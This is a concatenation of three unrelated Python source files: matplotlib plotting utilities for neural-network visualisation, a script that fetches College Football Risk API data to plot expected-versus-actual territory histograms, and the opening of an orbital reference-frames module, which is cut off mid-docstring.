        for k, v in values:
            if k not in self.sum_values:
                self.sum_values[k] = [v * (current - self.seen_so_far), current - self.seen_so_far]
                self.unique_values.append(k)
            else:
                self.sum_values[k][0] += v * (current - self.seen_so_far)
                self.sum_values[k][1] += (current - self.seen_so_far)
        self.seen_so_far = current
        now = time.time()
        prev_total_width = self.total_width
        # Erase the previous render by backspacing over it.
        sys.stdout.write("\b" * prev_total_width)
        sys.stdout.write("\r")
        numdigits = int(np.floor(np.log10(self.target))) + 1
        barstr = '%s %%%dd/%%%dd [' % (self.title, numdigits, numdigits)
        bar = barstr % (current, self.target)
        prog = float(current) / self.target
        prog_width = int(self.width * prog)
        if prog_width > 0:
            bar += ('=' * (prog_width - 1))
            if current < self.target:
                bar += '>'  # arrow head while still in progress
            else:
                bar += '='
        bar += ('.' * (self.width - prog_width))
        bar += ']'
        sys.stdout.write(bar)
        self.total_width = len(bar)
        # ETA from the mean time per step so far.
        if current:
            time_per_unit = (now - self.start) / current
        else:
            time_per_unit = 0
        eta = time_per_unit * (self.target - current)
        info = ''
        if current < self.target:
            info += ' - ETA: %ds' % eta
        else:
            info += ' - %ds' % (now - self.start)
        for k in self.unique_values:
            info += ' - %s:' % k
            if type(self.sum_values[k]) is list:
                avg = self.sum_values[k][0] / max(1, self.sum_values[k][1])
                # Small averages switch to scientific notation.
                if abs(avg) > 1e-3:
                    info += ' %.4f' % avg
                else:
                    info += ' %.4e' % avg
            else:
                info += ' %s' % self.sum_values[k]
        self.total_width += len(info)
        # Pad with spaces so leftovers from a longer previous line are wiped.
        if prev_total_width > self.total_width:
            info += ((prev_total_width - self.total_width) * " ")
        sys.stdout.write(info)
        if current >= self.target:
            sys.stdout.write("\n")
        sys.stdout.flush()
    def add(self, n, values=[]):
        # Relative variant of update(): advance the bar by n steps.
        self.update(self.seen_so_far + n, values)
# ===========================================================================
# Plot genes
# ===========================================================================
def plot_genes(matrices):
    """Display one or more 2-D matrices as heatmaps on a grid 10 wide.

    Accepts a single 2-D array, a 3-D array (split along the first axis),
    or a list/tuple of 2-D arrays. Raises ValueError when any individual
    matrix is not 2-D. Blocks until the window is closed.
    """
    colormap = 'Reds'
    # BUG FIX: the original read ``matrices.ndim`` before the list/tuple
    # check, so passing a list raised AttributeError on the dead branch.
    if isinstance(matrices, (tuple, list)):
        matrices = list(matrices)
    elif matrices.ndim == 3:
        matrices = [i for i in matrices]
    else:
        matrices = [matrices]
    nrow = int(math.ceil(len(matrices) / 10))
    # ====== test ====== #
    for i, matrix in enumerate(matrices):
        ax = plt.subplot(nrow, 10, i + 1)
        if matrix.ndim != 2:
            raise ValueError("Only accept matrix with 2-dimensions, "
                             "but the given input has %d-dimensions" % matrix.ndim)
        ax.pcolorfast(matrix, cmap=colormap, alpha=0.9)
        ax.set_xticks([])
        ax.set_yticks([])
        ax.axis('off')
    plt.show(block=True)
# ===========================================================================
# Plot images
# ===========================================================================
def resize_images(x, shape):
    """Resize a batch of images to ``shape`` with bilinear interpolation.

    ``x`` is 3-D (batch of gray images) or 4-D (batch of color images with
    the channel as the first per-image dimension). Returns a list of
    resized arrays.

    NOTE(review): relies on scipy.misc.imresize, which was deprecated and
    removed in SciPy 1.3 -- this needs porting (e.g. to PIL or
    skimage.transform.resize) to run on modern SciPy.
    """
    from scipy.misc import imresize
    # 3-D input: each element is a plain 2-D gray image.
    reszie_func = lambda x, shape: imresize(x, shape, interp='bilinear')
    if x.ndim == 4:
        def reszie_func(x, shape):
            # x: 3D
            # The color channel is the first dimension
            tmp = []
            for i in x:
                tmp.append(imresize(i, shape).reshape((-1,) + shape))
            # Restore the channel axis position after per-channel resizing.
            return np.swapaxes(np.vstack(tmp).T, 0, 1)
    imgs = []
    for i in x:
        imgs.append(reszie_func(i, shape))
    return imgs
def tile_raster_images(X, tile_shape=None, tile_spacing=(2, 2), spacing_value=0.):
    ''' This function create tile of images

    Parameters
    ----------
    X : 3D-gray or 4D-color images
        for color images, the color channel must be the second dimension
    tile_shape : tuple
        resized shape of images
    tile_spacing : tuple
        space betwen rows and columns of images
    spacing_value : int, float
        value used for spacing

    Returns
    -------
    A single 2-D array with all images laid out on an n-by-n grid
    (n = ceil(sqrt(len(X)))), separated by ``tile_spacing`` pixels of
    ``spacing_value``.
    '''
    if X.ndim == 3:
        img_shape = X.shape[1:]
    elif X.ndim == 4:
        img_shape = X.shape[2:]
    else:
        raise ValueError('Unsupport %d dimension images' % X.ndim)
    if tile_shape is None:
        tile_shape = img_shape
    if tile_spacing is None:
        tile_spacing = (2, 2)
    # Resize only when the requested tile shape differs; otherwise just
    # swap the first two axes of each transposed image.
    if img_shape != tile_shape:
        X = resize_images(X, tile_shape)
    else:
        X = [np.swapaxes(x.T, 0, 1) for x in X]
    n = len(X)
    # Side length of the square grid the images are arranged on.
    n = int(np.ceil(np.sqrt(n)))
    # create spacing
    rows_spacing = np.zeros_like(X[0])[:tile_spacing[0], :] + spacing_value
    # A blank cell (image-sized block plus its row spacing) used to pad
    # the last, partially filled grid row.
    nothing = np.vstack((np.zeros_like(X[0]), rows_spacing))
    cols_spacing = np.zeros_like(nothing)[:, :tile_spacing[1]] + spacing_value
    # ====== Append columns ====== #
    rows = []
    for i in range(n):  # each rows
        r = []
        for j in range(n):  # all columns
            idx = i * n + j
            if idx < len(X):
                r.append(np.vstack((X[i * n + j], rows_spacing)))
            else:
                r.append(nothing)
            if j != n - 1:  # cols spacing
                r.append(cols_spacing)
        rows.append(np.hstack(r))
    # ====== Append rows ====== #
    # Strip the trailing row spacing under the bottom grid row.
    img = np.vstack(rows)[:-tile_spacing[0]]
    return img
def plot_images(X, tile_shape=None, tile_spacing=None, fig=None, title=None):
    '''Show one or more image batches, one tiled panel per batch.

    X : 2D-gray or 3D-color images, or list of (2D, 3D images);
        for color images the color channel is the second dimension.
    Each entry is tiled with tile_raster_images and drawn on an n-by-n
    subplot grid of ``fig`` (a new figure when fig is None).
    Returns the figure.
    '''
    from matplotlib import pyplot as plt
    if not isinstance(X, (tuple, list)):
        X = [X]
    if not isinstance(title, (tuple, list)):
        title = [title]
    grid = int(np.ceil(np.sqrt(len(X))))
    for idx, (img, caption) in enumerate(zip(X, title)):
        if img.ndim in (2, 3):
            cmap = plt.cm.Greys_r
        elif img.ndim == 4:
            cmap = None
        else:
            raise ValueError('NO support for %d dimensions image!' % img.ndim)
        tiled = tile_raster_images(img, tile_shape, tile_spacing)
        if fig is None:
            fig = plt.figure()
        panel = fig.add_subplot(grid, grid, idx + 1)
        panel.imshow(tiled, cmap=cmap)
        if caption is not None:
            panel.set_title(str(caption), fontsize=12)
        panel.axis('off')
    fig.tight_layout()
    return fig
def plot_confusion_matrix(cm, labels):
    """Draw a confusion matrix as a heatmap on the current axes.

    Raw count matrices (max > 1) are row-normalized first; matrices that
    already look normalized are drawn as-is. Returns the axes.
    """
    from matplotlib import pyplot as plt
    title = 'Confusion matrix'
    cmap = plt.cm.Blues
    # column normalize
    if np.max(cm) > 1:
        normalized = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
    else:
        normalized = cm
    axis = plt.gca()
    im = axis.imshow(normalized, interpolation='nearest', cmap=cmap)
    axis.set_title(title)
    ticks = np.arange(len(labels))
    axis.set_xticks(ticks)
    axis.set_yticks(ticks)
    axis.set_xticklabels(labels, rotation=90, fontsize=13)
    axis.set_yticklabels(labels, fontsize=13)
    axis.set_ylabel('True label')
    axis.set_xlabel('Predicted label')
    # Turns off grid on the left Axis.
    axis.grid(False)
    plt.colorbar(im, ax=axis)
    return axis
def plot_weights(x, keep_aspect=True):
    '''Render a 1-D or 2-D weight array as a grey heatmap on the current axes.

    Parameters
    ----------
    x : np.ndarray
        1-D or 2-D array; 1-D input is treated as a single column.
    keep_aspect : bool
        force an equal aspect ratio when True.

    Returns
    -------
    matplotlib.Axis (title set to the array's shape, ticks hidden, with a
    colorbar attached).

    Raises
    ------
    ValueError for arrays with more than 2 dimensions.

    Example
    -------
    >>> x = np.random.rand(2000, 1000)
    >>> fig = plt.figure()
    >>> ax = fig.add_subplot(2, 2, 1)
    >>> dnntoolkit.visual.plot_weights(x, ax)
    >>> plt.show()
    '''
    from matplotlib import pyplot as plt
    if x.ndim > 2:
        raise ValueError('No support for > 2D')
    elif x.ndim == 1:
        x = x[:, None]
    ax = plt.gca()
    if keep_aspect:
        ax.set_aspect('equal', 'box')
    ax.set_xticks([])
    ax.set_yticks([])
    ax.axis('off')
    ax.set_title(str(x.shape), fontsize=6)
    heat = ax.pcolorfast(x, cmap='Greys', alpha=0.8)
    plt.grid(True)
    plt.colorbar(heat, ax=ax)
    return ax
def plot_weights4D(x):
    '''Visualize a 4-D weight tensor as a grid of tiled filter heatmaps.

    Each slice x[i] is tiled with tile_raster_images and drawn on a
    square subplot grid; a shared colorbar is attached. Returns the figure.

    Example
    -------
    >>> x = np.random.rand(32, 3, 28, 28)
    >>> plot_weights4D(x)
    '''
    shape = x.shape
    if len(shape) != 4:
        raise ValueError('This function only support 4D weights matrices')
    fig = plt.figure()
    tiles = [tile_raster_images(x[i], tile_spacing=(3, 3)) for i in range(shape[0])]
    ncols = int(np.ceil(np.sqrt(shape[0])))
    nrows = int(ncols)
    count = 0
    for row in range(nrows):
        for col in range(ncols):
            count += 1
            # The square grid may have more cells than filters.
            if count > shape[0]:
                continue
            ax = fig.add_subplot(nrows, ncols, count)
            ax.set_aspect('equal', 'box')
            ax.set_xticks([])
            ax.set_yticks([])
            ax.axis('off')
            # image data: no idea why pcolorfast flip image vertically
            img = ax.pcolorfast(tiles[count - 1][::-1, :], cmap='Reds', alpha=0.9)
            plt.tight_layout()
    # colorbar shared across all panels
    axes = fig.get_axes()
    fig.colorbar(img, ax=axes)
    return fig
|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 23 23:02:12 2020
@author: Connor
This file will be my CFB risk modules.
"""
#
# Imports
#
import requests as reqs
import numpy as np
import matplotlib.pyplot as plt
from scipy.special import erf
# Root of the College Football Risk public API.
_BASE ="https://collegefootballrisk.com/api"
# Season queried by default throughout this module.
_SEASON = 1
plt.style.use("bmh")  # global matplotlib style for every figure below
class Territory:
    """A single map territory and the teams contesting it."""

    def __init__(self):
        self.name = None      # territory name
        self.occupier = None  # team currently holding the territory
        self.winner = None    # team that won it this turn
        self.teams = []       # Team objects with a presence here

    def __repr__(self):
        if self.name and self.occupier:
            return f"""Territory<{self.name} owned by {self.occupier}>"""
        if self.name:
            return f"""Territory<{self.name}>"""
        return "Territory<>"
class Team:
    """A team's presence and odds within a territory."""

    def __init__(self):
        self.name = None     # team name
        self.p_color = None  # primary color
        self.s_color = None  # secondary color
        self.power = None    # star power committed
        self.chance = None   # odds of taking the territory

    def __repr__(self):
        return f"""Team<{self.name}>""" if self.name else "Team<>"
def make_territory_list(day, season=_SEASON):
    """
    Fetch the territory list for the given day and wrap each entry in a
    Territory object (names only; details are filled in separately).
    """
    response = reqs.get(_BASE+"/territories",
                        params={"season": season,
                                "day": day})
    result = []
    for entry in response.json():
        tory = Territory()
        tory.name = entry["name"]
        result.append(tory)
    return result
def populate_territories(territory_list, day=1, season=_SEASON):
    """Fill in occupier/winner/team data for every territory in the list.

    BUG FIX: the original called set_territory_data(terry) without the
    required ``day`` argument, raising TypeError on every call. ``day``
    is added with a default of 1 so the old call signature keeps working.
    """
    for terry in territory_list:
        set_territory_data(terry, day, season)
    return territory_list
def set_territory_data(terry: Territory, day, season=_SEASON):
    """
    Idea is to have a large list of Territory objects which is populated via
    the /territory/turn api call.

    NOTE(review): the query sends the territory name as the ``team``
    parameter -- confirm against the API that this is the intended key.
    """
    territory_req = reqs.get(_BASE+"/territory/turn",
                             params={"season": season,
                                     "day": day,
                                     "team": terry.name})
    territory_info = territory_req.json()
    terry.occupier = territory_info["occupier"]
    terry.winner = territory_info["winner"]
    # BUG FIX: the original iterated the Response object itself (which
    # yields raw byte chunks, so tory["teams"] could never work) and the
    # Team objects it built were discarded. Build teams from the decoded
    # payload and attach them to the territory.
    for this_team in territory_info["teams"]:
        team = Team()
        team.name = this_team["team"]
        team.p_color = this_team["color"]
        team.s_color = this_team["secondaryColor"]
        team.power = this_team["power"]
        terry.teams.append(team)
def yline(loc, *args, ax=None, **kwargs):
    """Draw a vertical line at x=loc spanning the current y-limits, then
    restore those limits so autoscale does not move them.

    Draws on ``ax`` when given, otherwise on the active pyplot axes.
    """
    if ax is not None:
        limits = ax.get_ylim()
        ax.plot([loc, loc], limits, *args, **kwargs)
        ax.set_ylim(limits)
    else:
        limits = plt.ylim()
        plt.plot([loc, loc], limits, *args, **kwargs)
        plt.ylim(limits)
def create_expected_value_hist(
        team_name,
        day,
        prev_num_terry,
        num_runs=100000,
        season=_SEASON,
        axis=None,
        save_dir=None
):
    """
    ``create_expected_value_hist``, as the name suggests, creates an expected
    value histogram for a given team and day from the data in the CFB_RISK api.
    if ax = None, plt.gca() is used.

    Returns (mu, sigma, dsigma, act, cdf) on success; returns None (after
    printing the error) when anything fails, which callers detect as a
    TypeError when unpacking the result.
    """
    try:
        team_odds_req = reqs.get(_BASE+"/team/odds",
                                 params={"season": season,
                                         "day": day,
                                         "team": team_name})
        team_odds_info = team_odds_req.json()
        teams_req = reqs.get(_BASE+"/teams")
        team_info = teams_req.json()
        # Look up the team's colors, given as "rgba(r,g,b,a)" strings.
        p_color = None
        for team in team_info:
            if team["name"] == team_name:
                p_color = team["colors"]["primary"]
                s_color = team["colors"]["secondary"]
                break
        if p_color is None:
            raise ValueError(f"Invalid team_name = {team_name}")
        # Parse "rgba(...)" into float tuples; RGB channels scaled to [0, 1].
        p_color = tuple(float(val)/255 if ii < 3 else float(val) for ii, val in enumerate(p_color[5:-1].split(",")))
        s_color = tuple(float(val)/255 if ii < 3 else float(val) for ii, val in enumerate(s_color[5:-1].split(",")))
        # Pure white would be invisible on the plot; fall back to black.
        if p_color[0:3] == (1, 1, 1):
            p_color = (0, 0, 0, p_color[3])
        if s_color[0:3] == (1, 1, 1):
            s_color = (0, 0, 0, s_color[3])
        num_territories = len(team_odds_info)
        # Per-territory win probability; 1 for uncontested territories.
        odds = [tory["teamPower"]/tory["territoryPower"]  # put the stats, else 1
                if tory["territoryPower"]>0 else 1        # if denom != 0
                for tory in team_odds_info]               # for tory in odds_info
        # PDF of the number of territories won: convolution of independent
        # Bernoulli distributions (Poisson binomial distribution).
        vals = 1
        for k in odds:
            vals = np.convolve(vals, [1-k, k])
        # axis handling
        if axis is None:
            fig = plt.figure()
            _ax = plt.gca()
        else:
            _ax = axis
        # Actual vs expected number of territories won.
        act = sum([1 if tory["winner"] == team_name else 0 for tory in team_odds_info])
        exp = sum(odds)
        # Gets the Expected Value numerically to validate expected Odds
        mu = np.sum(vals*np.arange(len(vals)))
        # Gets the Sigma numerically to validate variance
        sigma = np.sqrt(sum(vals*(np.arange(len(vals)) - mu)**2))
        dsigma = (act-mu) / sigma
        if dsigma < 0:
            act_color = "#781b0e"  # red: under-performed expectation
        else:
            act_color = "#3b8750"  # green: met or beat expectation
        # Normal approximation overlay and the CDF at the actual result.
        x = np.linspace(0, num_territories, 5000)
        y = (1 / (np.sqrt(2 * np.pi * np.power(sigma, 2)))) * \
            (np.power(np.e, -(np.power((x - mu), 2) / (2 * np.power(sigma, 2)))))
        cdf = 0.5 * (1 + erf((act-exp)/(np.sqrt(2)*sigma)))
        _ax.plot(x,y*100, linestyle="-", linewidth=0.5, color="#54585A", label="$X$ ~ $N(\mu, \sigma)$")
        _ax.bar(np.arange(num_territories+1), vals*100, 0.9, align="center", color=p_color, edgecolor=s_color)
        yline(exp, ax=_ax, linestyle=(0,(2,2)), linewidth=2, color="#081840", label="Expected Value")
        yline(act, ax=_ax, linestyle=(0,(2,2)), linewidth=2, color=act_color, label="Actual Territories")
        yline(prev_num_terry, ax=_ax, linestyle=(0,(1,1)), linewidth=2, color="#ffb521", label="Prev Num. Territories")
        dT = act - prev_num_terry
        _ax.set_title(f"Number of Territories Histogram: {team_name}\n$Expected: {exp:2.2f}$, $Actual: {act}$, $\Delta Territories = {dT}$")
        _ax.set_xlabel("Number of Territories Won")
        _ax.set_ylabel("Percent Chance to Win N Territories (%)")
        my_anno_text = f"""$\mu = {mu:2.3f}$
$3\sigma = {3*sigma:2.3f}$
$\Delta\sigma = {dsigma:2.3f}$
$P(Draw) = {100*vals[act]:2.3f}\%$"""
        # Place the legend and annotation where they least overlap the bars.
        x_min, x_max = _ax.get_xlim()
        y_min, y_max = _ax.get_ylim()
        if (mu) < (x_max-x_min)//2:
            # put both on right:
            _ax.legend(loc="upper right")
            _ax.text(0.72,
                     0.08,
                     my_anno_text,
                     bbox={'facecolor': 'white', 'alpha': 0.7},
                     transform=_ax.transAxes)
        elif vals[0] > 5:
            # top
            _ax.legend(loc="upper left")
            _ax.text(0.72,
                     0.80,
                     my_anno_text,
                     bbox={'facecolor': 'white', 'alpha': 0.7},
                     transform=_ax.transAxes)
        else:
            # left
            _ax.legend(loc="upper left")
            _ax.text(0.03,
                     0.10,
                     my_anno_text,
                     bbox={'facecolor': 'white', 'alpha': 0.7},
                     transform=_ax.transAxes)
        # BUG FIX: ``fig`` only exists when we created the figure ourselves
        # (axis is None); the original referenced it unconditionally and
        # the bare except silently ate the resulting NameError.
        if save_dir is not None and axis is None:
            fig.savefig(save_dir / f"{team_name.lower().replace(' ', '_')}_territory_hist.png", dpi=150)
        return mu, sigma, dsigma, act, cdf
    except Exception as exc:
        # BUG FIX: the original bare ``except: print("")`` swallowed every
        # error (even KeyboardInterrupt/SystemExit) with no diagnostics.
        # Report the failure; the implicit ``return None`` is preserved for
        # callers that rely on the TypeError-on-unpack convention.
        print(f"create_expected_value_hist failed for {team_name}: {exc!r}")
def create_all_hists(
        day,
        season=_SEASON,
        save_dir=None
):
    """Generate the expected-value histogram for every team on the
    leaderboard for ``day``.

    Returns ((min dsigma, team name), (max dsigma, team name)) -- the
    unluckiest and luckiest teams of the day.
    """
    leader_req = reqs.get(_BASE+"/stats/leaderboard",
                          params={"season": season,
                                  "day": day})
    leaders = leader_req.json()
    # Yesterday's board is only needed (and only fetched) after day 1.
    if day > 1:
        leader_req_yest = reqs.get(_BASE+"/stats/leaderboard",
                                   params={"season": season,
                                           "day": day-1})
        leader_yest = leader_req_yest.json()
    mu = np.ones((len(leaders),))
    sig = np.ones((len(leaders),))
    dsig = np.ones((len(leaders),))
    act = np.ones((len(leaders),))
    for ind, leader in enumerate(leaders):
        print("Making hist for: ", leader["name"])
        if day > 1:
            prev_num_terry = [ll for ll in leader_yest if ll["name"] == leader["name"]][0]["territoryCount"]
        else:
            prev_num_terry = leader["territoryCount"]
        try:
            # create_expected_value_hist returns None on failure; unpacking
            # None raises the TypeError handled below.
            mu[ind], sig[ind], dsig[ind], act[ind], cdf = create_expected_value_hist(
                leader["name"],
                day,
                int(prev_num_terry),
                season=season,
                save_dir=save_dir)
        except TypeError as inst:
            print("Unable to make hist for ", leader["name"], ". May not have any players today.")
            print(inst)
    return (min(dsig), leaders[np.argmin(dsig)]["name"]), (max(dsig), leaders[np.argmax(dsig)]["name"])
#%% Run Script with functions above
# HIT CTRL ENTER HERE TO RUN THE DAY'S DATA.
from pathlib import Path
import datetime
date = datetime.date
import os
# When SAVE_FLAG is set, figures go into a per-day artifact directory;
# REPLACE_FLAG reuses an existing day directory instead of the temp one.
# NOTE(review): with SAVE_FLAG = False, ``save_dir`` is never defined and
# the create_all_hists call below would raise NameError.
SAVE_FLAG = True
REPLACE_FLAG = True
if SAVE_FLAG:
    figs_base_dir = Path(r"D:\Connor\Documents\GA 2022\Risk\cfb_artifacts")
    check_dir = figs_base_dir / f"{date.today().isoformat()}"
    asserted_dir = figs_base_dir / "temp_dir"
    if not check_dir.exists():
        os.mkdir(check_dir)
        save_dir = check_dir
    else:
        if REPLACE_FLAG:
            save_dir = check_dir
        else:
            save_dir = asserted_dir
# Day number counted from the season start (2022-01-15), then overridden
# to a fixed day for this run.
dt_now = datetime.datetime.now()
deltaT = dt_now-datetime.datetime(2022, 1, 15)
day = deltaT.days
day = 3
mins_team, max_team = create_all_hists(day, save_dir=save_dir)
#%
num_days = day
leader_req = reqs.get(_BASE+"/stats/leaderboard",
                      params={"season": _SEASON,
                              "day": 1})
leaders = leader_req.json()
# team name -> [scaled cdf per day, delta-sigma per day, territory delta per day]
leader_list = [(leaders[i]["name"], [np.array([np.nan]*num_days), np.array([np.nan]*num_days), np.append(0, np.array([np.nan]*num_days))]) for i in range(len(leaders))]
team_dict = dict(leader_list)
for day in range(num_days, num_days+1):
    print(f"Generating plots for day={day}...")
    leader_req = reqs.get(_BASE+"/stats/leaderboard",
                          params={"season": _SEASON,
                                  "day": day})
    leaders = leader_req.json()
    leader_req_prev = reqs.get(_BASE+"/stats/leaderboard",
                               params={"season": _SEASON,
                                       "day": day-1})
    leaders_prev = leader_req_prev.json()
    leader_list = [(leaders[i]["name"], [np.array([np.nan]*num_days), np.array([np.nan]*num_days), np.append(0, np.array([np.nan]*num_days))]) for i in range(len(leaders))]
    team_dict = dict(leader_list)
    for ind, leader in enumerate(leaders):
        print("Making hist for: ", leader["name"])
        try:
            prev_data = [ll for ll in leaders_prev if ll["name"] == leader["name"]]
            mu, sig, dsig, act, cdf = create_expected_value_hist(
                leader["name"],
                day,
                int(prev_data[0]["territoryCount"]),
                season=_SEASON)
            prev_day = int(leader["territoryCount"])
            # scale the cdf output from [0, 1] to [-1, 1]
            team_dict[leader["name"]][0][day-1] = cdf*2 - 1
            team_dict[leader["name"]][1][day-1] = dsig
            team_dict[leader["name"]][2][day] = act-prev_day
        except TypeError:
            print("Unable to make hist for ", leader["name"], ". May not have any players today.")
    plt.close()
#%
# step = 0.01
# x = np.arange(-1, 1+step, step)
# unif = np.ones(x.shape)
# out = np.copy(unif)
# for i in range(day):
# out = np.convolve(out, unif)
# out = out / sum(out)
# x = np.linspace(-day, day, len(out))
# plt.plot(x, out)
#%%
# Run after dict is populated
# plt.close("all")
# team_req = reqs.get(_BASE+"/teams")
# team_info = team_req.json()
# # filter team_info to match what exists:
# for team in leader_list:
# team_name = team[0]
# team_uni, team_dsig, team_dt = np.copy(team_dict[team_name])
# for info in team_info:
# if info["name"] == team_name:
# p_color = info["colors"]["primary"].strip()
# s_color = info["colors"]["secondary"].strip()
# p_color = tuple(float(val)/255 if ii < 3 else float(val) for ii, val in enumerate(p_color[5:-1].split(",")))
# s_color = tuple(float(val)/255 if ii < 3 else float(val) for ii, val in enumerate(s_color[5:-1].split(",")))
# if p_color[0:3] == (1, 1, 1):
# p_color = (0, 0, 0, p_color[3])
# color = p_color
# else:
# if s_color[0:3] == (1, 1, 1):
# s_color = (0, 0, 0, s_color[3])
# color = s_color
# style = "-"
# # if team_name not in ['Alabama', 'Nebraska', 'Oklahoma', 'Stanford', 'Texas A&M', 'Wisconsin']:
# # style = "-"
# # else:
# # if team_name in ["Wisconsin", "Stanford"]:
# # style = "--"
# # elif team_name in ["Texas A&M", "Oklahoma"]:
# # style = "-."
# # else:
# # style = "-"
# fig101 = plt.figure(101, figsize=(12,7))
# if sum(~np.isnan(team_dsig)) > 20:
# plt.plot(np.arange(1, len(team_uni)+1),
# np.cumsum(team_uni),
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# label=team_name)
# else:
# plt.plot(np.arange(1, len(team_uni)+1),
# np.cumsum(team_uni),
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# alpha=0.7)
# plt.legend(bbox_to_anchor=(1.02,0.5), loc="center left")
# plt.title("Plot of $\sum_{n=1}^{day} (Actual_n - \mu_n)$")
# plt.xlabel("Day")
# plt.ylabel("Cumulative $(Actual_n - \mu_n)$")
# plt.tight_layout()
# fig102 = plt.figure(102, figsize=(12,7))
# if sum(~np.isnan(team_dsig)) > 20:
# plt.plot(np.arange(1, len(team_dsig)+1),
# np.cumsum(team_dsig),
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# label=team_name)
# else:
# plt.plot(np.arange(1, len(team_dsig)+1),
# np.cumsum(team_dsig),
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# alpha=0.7)
# plt.legend(bbox_to_anchor=(1.02,0.5), loc="center left")
# plt.title("Plot of $\sum_{n=1}^{day} \Delta\sigma_n$")
# plt.xlabel("Day")
# plt.ylabel("Cumulative $\Delta\sigma_n$")
# plt.tight_layout()
# fig103 = plt.figure(103, figsize=(12,7))
# ax103 = plt.gca()
# ax103.minorticks_on()
# if sum(~np.isnan(team_dsig)) > 20:
# plt.plot(np.arange(1, len(team_dt)+1),
# np.cumsum(team_dt)+1,
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# label=team_name)
# else:
# plt.plot(np.arange(1, len(team_dt)+1),
# np.cumsum(team_dt)+1,
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# alpha=0.7)
# plt.legend(bbox_to_anchor=(1.02,0.5), loc="center left")
# plt.title("Plot of $Territories_n$")
# plt.xlabel("Day")
# plt.ylabel("$Territories_n$")
# plt.tight_layout()
# plt.grid(True, which="major")
# plt.grid(True, which="minor", color="#c6c6c6")
# fig104 = plt.figure(104, figsize=(12,7))
# ax104 = plt.gca()
# plt.plot(x,
# out,
# color="#111111",
# linestyle="-",
# marker="",
# alpha=1,
# )
# if sum(~np.isnan(team_dsig)) > 20:
# yline(np.sum(team_uni),
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# label=team_name)
# else:
# yline(np.sum(team_uni),
# color=color,
# linestyle=style,
# marker=".",
# markersize=6,
# alpha=0.7)
# plt.legend(bbox_to_anchor=(1.02,0.5), loc="center left")
# plt.title("Overall Luck Histogram")
# plt.xlabel("Value")
# plt.ylabel("Odds")
# plt.tight_layout()
# plt.grid(True, which="major")
# plt.grid(True, which="minor", color="#c6c6c6")
# fig101.savefig(save_dir / "delta_exp_and_act_per_day.png", dpi=200)
# fig102.savefig(save_dir / "delta_sigma_per_day.png", dpi=200)
# fig103.savefig(save_dir / "territories_per_day.png", dpi=200)
# fig104.savefig(save_dir / "overall_luck_histogram.png", dpi=200)
# plt.figure(104, figsize=(12,7))
# if sum(~np.isnan(team_dsig)) > 20:
# plt.plot(np.arange(1, len(team_dt)+1),
# team_dt,
# color=color,
# linestyle=style,
# marker=".",
# label=team_name)
# else:
# plt.plot(np.arange(1, len(team_dt)+1),
# team_dt,
# color=color,
# linestyle=style,
# marker=".",
# alpha=0.7)
# plt.legend(bbox_to_anchor=(1.02,0.5), loc="center left")
# plt.title("Plot of $Territories_n$")
# plt.xlabel("Day")
# plt.ylabel("$Territories_n$")
# plt.tight_layout()
# Wanna make a MC sim to see the chance of a team getting +10 cumulative sigma
# or -10 cumulative sigma
# is this like, frequently going to happen?
# Roll 50 turns of normal random variables 100,000 times for 100 teams
# see what the max and min of each "run" is and save that tuple
#%%
# import numpy as np
# num_runs = 100000
# max_vals = np.array([])
# min_vals = np.array([])
# for i in range(num_runs):
# game = np.random.randn(10,50)
# run = np.sum(game, axis=0)
# run_max, run_min = np.max(run), np.min(run)
# max_vals = np.append(max_vals, run_max)
# min_vals = np.append(min_vals, run_min)
# #%%
# max_vals.sort()
# min_vals.sort()
# max_st = int(np.floor(max_vals[0]))
# max_end = int(np.ceil(max_vals[-1])+1)
# min_st = int(np.floor(min_vals[0]))
# min_end = int(np.ceil(min_vals[-1])+1)
# max_counts = np.array([])
# min_counts = np.array([])
# max_bins = np.array([])
# min_bins = np.array([])
# for i in range(max_st, max_end):
# cnts = sum((max_vals < i+1) & (max_vals >= i))
# max_counts = np.append(cnts, max_counts)
# max_bins = np.append(i, max_bins)
# for i in range(min_st, min_end):
# cnts = sum((min_vals < i+1) & (min_vals >= i))
# min_counts = np.append(cnts, min_counts)
# min_bins = np.append(i, min_bins)
# plt.figure()
# plt.bar(max_bins, max_counts / 1000)
# plt.figure()
# plt.bar(min_bins, min_counts / 1000) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""This module define the Frames available for computation and their relations
to each other.
The relations may be circular, thanks to the use of the Node class.
.. code-block:: text
,---. ,-------. ,----.
|G50|---bias---|EME2000|..bias..|GCRF|
`---' `-------' `----'
| |
Precession |
| |
,---. Precession
|MOD| +
`---' Nutation
| + model corrections
Nutation |
+ model corrections |
| |
,----. ,---. ,----.
|TEME|--Equinox--|TOD| |CIRF|
`----' `---' `----'
| |
Sideral time Sideral time
| |
,---. ,----.
|PEF| |TIRF|
`---' `----'
\\ /
IAU 1980 IAU 2010
Earth Orientation Earth Orientation
Parameters Parameters
\\ /
,-----. ,----.
|WGS84|--identity--|ITRF|
`-----' `----'
"""
import sys
import logging
import numpy as np
from ..errors import UnknownFrameError
from ..constants import Earth
from ..utils.matrix import rot3
from ..utils.node import Node
from . import iau1980, iau2010
from .local import to_qsw, to_tnw
# Frame families (see the module docstring diagram): the IAU 2010
# CIO-based chain, the IAU 1980 equinox-based chain, and the rest.
CIO = ["ITRF", "TIRF", "CIRF", "GCRF"]
IAU1980 = ["TOD", "MOD"]
OTHER = ["EME2000", "TEME", "WGS84", "PEF", "G50"]
__all__ = CIO + IAU1980 + OTHER + ["get_frame"]
log = logging.getLogger(__name__)
class FrameCache(dict):
    """Dict subclass that also exposes its keys as attributes.

    This class is here to emulate module behavior for dynamically
    created frames -- useful when pickle is involved
    (e.g. multiprocessing).
    """
    def __getattr__(self, name):
        if name in self:
            return self[name]
        raise AttributeError(name)
# Global registry of frames, filled by _MetaFrame at class-creation time.
dynamic = FrameCache()
"""This dictionary contains all the frames. Those defined here, and those created on the fly
by the developer.
"""

# Expose the registry as a pseudo-module so that pickled dynamically-created
# frames can be re-imported (e.g. by multiprocessing workers).
sys.modules[__name__ + ".dynamic"] = dynamic
def get_frame(frame):
    """Frame factory

    Args:
        frame (str): name of the desired frame
    Return:
